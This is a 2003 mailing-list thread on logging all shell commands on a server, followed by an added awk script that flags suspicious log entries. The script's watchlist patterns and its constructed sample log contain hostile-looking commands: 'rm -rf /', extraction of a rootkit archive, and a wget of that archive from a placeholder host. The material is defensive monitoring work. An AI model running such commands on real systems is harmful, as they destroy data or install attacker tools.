If your programmer gives you the diff could you please send it to me too? Thank you.
Eddy Petrisor

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, October 29, 2003 7:29 AM
> To: Dan MacNeil; [email protected]
> Subject: Re: command logging
>
> On Tue, Oct 28, 2003 at 10:56:53PM -0500, Dan MacNeil wrote:
> >
> > For a box that will have limited shell access, I'm looking for something
> > that will log all commands. The sudo log is nice but not everything is run
> > through sudo.
> >
> > There won't be many privacy issues as most users won't have shell.
> >
> > The goal is to review a daily report for anything unexpected: stuff like:
> >
> > tar -xzf rootkit.tar.gz
>
> For several servers I maintain we took the bash code and hacked it to
> log all commands, with usernames, to a log file. Yes, it's nosy. It's
> actually called 'nosy bash' by us. It's not been sent to the bash
> maintainers at all yet, but I could see if my coder can make a diff of
> it.
>
> It's come in quite handy at times. Quite handy.
>
> "I didn't do that!"
> "Well, yes, you did. At 1:43:00 you type 'rm -rf /' "
> "No I didn't"
> "Yes, see, it's in the logs."
> "Oh.. ummm..."
> <disable account>
> "Bu bye".
>
> I regularly grep the log for keywords or sometimes tail it if I'm
> suspicious of someone. But for the most part, I don't ogle it
> constantly. Who has time for that?
>
> I'm also running grsec patches as well. Grsec didn't do the nosy bash
> like I wanted, so I'm keeping the nosy bash.
>
> j
>
> --
>
> ==================================================
> + It's simply not     | John Keimel              +
> + RFC1149 compliant!  | [EMAIL PROTECTED]        +
> +                     | http://www.keimel.com    +
> ==================================================
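
As an added example (not nosy bash and not code from anyone in this thread), the daily keyword review discussed above can be scripted as follows. The log line format, the watchlist rules and the sample entries are assumptions constructed for illustration, since the thread does not show what the patched bash writes.

```shell
#!/bin/sh
# Added example, not nosy bash. ASSUMED log line format (constructed):
#   YYYY-MM-DD HH:MM:SS username command...

# Print flagged commands for one day as: date time user [rule] command
# $1 = log file, $2 = day (YYYY-MM-DD)
daily_report() {
    awk -v day="$2" '
    BEGIN {
        # Watchlist (illustrative): label plus extended regex. The command is
        # padded with spaces so each rule can require a delimiter on both sides.
        label[1] = "archive unpacked";  pat[1] = "[;&| ]tar +-?[a-zA-Z]*x"
        label[2] = "recursive rm on /"; pat[2] = "[;&| ]rm +-[a-zA-Z]*[rR][a-zA-Z]* +/[;&| ]"
        label[3] = "file downloaded";   pat[3] = "[;&| ](wget|curl) "
        n = 3
    }
    $1 == day && NF >= 4 {
        cmd = $0
        sub(/^[^ ]+ +[^ ]+ +[^ ]+ +/, "", cmd)    # strip date, time, user
        for (i = 1; i <= n; i++)
            if ((" " cmd " ") ~ pat[i]) {
                printf "%s %s %s [%s] %s\n", $1, $2, $3, label[i], cmd
                break                             # one report line per command
            }
    }' "$1"
}

# Constructed sample log used for the demonstration run below.
sample_log() {
    cat <<'EOF'
2003-10-28 23:58:10 alice ls -la
2003-10-29 01:43:00 bob rm -rf /
2003-10-29 02:10:44 mallory wget http://example.invalid/rootkit.tar.gz
2003-10-29 02:11:02 mallory tar -xzf rootkit.tar.gz
2003-10-29 09:15:31 alice tar -czf backup.tgz /home/alice
2003-10-29 09:20:05 alice rm -rf /tmp/build
EOF
}

log=$(mktemp) && sample_log > "$log"
daily_report "$log" 2003-10-29
rm -f "$log"
```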

